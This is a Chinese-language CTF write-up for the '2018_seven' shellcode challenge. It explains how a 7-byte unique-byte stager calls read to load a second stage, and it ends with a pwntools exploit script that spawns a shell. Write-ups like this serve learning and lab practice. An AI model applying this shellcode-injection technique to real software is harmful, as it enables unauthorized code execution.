铁人三项(第五赛区)_2018_seven
先来看看保护
保护全开,IDA分析
首先申请了mmap两个随机地址的空间,一个为rwx,一个为rw
读入的都shellcode长度小于等于7,且这7个字符不能重复。
然后把一个叫initial的东西复制到rwx_page上,再把我们写的shellcode拼接到其后面
可能有些不太准,等会儿gdb调试的时候再看看
gdb调试进入执行的shellcode,分析一波
可以看到这是刚刚的那个initial,执行完了是这样的
RSP指向一片空白的区域。看到RAX,rdi为0,这里我想到了shellcode注入。我们要尽力构造sys_read来注入全部的shellcode,但是我们输入shellcode有限制。
这里我在调试的时候突然发现有的时候RSP跟RIP很近。因为RSP对应rw_page而 RIP:对应rwx_page,
这两块地址是随机的,所以存在他们离的很近的可能性。下图是我截到的图。
执行完initial的情况
好了我们现在只要做2件事。
- 构造read(0,RSP,len) 这里len必须要大一点
push rsp
pop rsi
mov dx,si
syscall
- 注入我们的shellcode,覆写syscall之后的指令
'A'*0xb37 + asm(shellcraft.sh())
毕竟这也是随机的,多试几次就行了。
exp:
from pwn import *
#context.log_level = 'debug'
context(os='linux',arch='amd64',endian='little')
p = process('./2018_seven')
#gdb.attach(p,'b *0x555555554d0b')
shellcode = asm('push rsp;pop rsi;mov dx,si;syscall')
p.sendafter('shellcode:
',shellcode)
sleep(1)
p.sendline('A'*0xb37+ asm(shellcraft.sh()))
p.interactive()